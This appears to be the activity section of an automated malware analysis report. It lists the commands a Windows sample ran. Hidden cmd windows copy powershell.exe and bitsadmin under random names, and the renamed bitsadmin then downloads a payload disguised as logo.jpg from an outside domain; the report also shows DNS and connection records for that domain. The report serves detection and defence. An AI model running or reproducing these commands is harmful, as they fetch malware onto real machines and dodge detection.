Technical Information
- '%ALLUSERSPROFILE%\osslfioin.exe' /transfer tAdvfv /download https://estebankott.com/ordasum/GRCPTR56P29G273X/logo.jpg %APPDATA%\logo.jpg
- %ALLUSERSPROFILE%\zarjmdco.exe
- %ALLUSERSPROFILE%\osslfioin.exe
- 'es###ankott.com':443
- DNS ASK es###ankott.com
- '<SYSTEM32>\cmd.exe' /c cmd /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zArjMdCO.exe & cmd /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\OsSlfIO*.exe' (with hidden window)
- '%ALLUSERSPROFILE%\osslfioin.exe' /transfer tAdvfv /download https://estebankott.com/ordasum/GRCPTR56P29G273X/logo.jpg %APPDATA%\logo.jpg' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c cmd /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zArjMdCO.exe & cmd /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\OsSlfIO*.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zArjMdCO.exe
- '<SYSTEM32>\cmd.exe' /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\OsSlfIO*.exe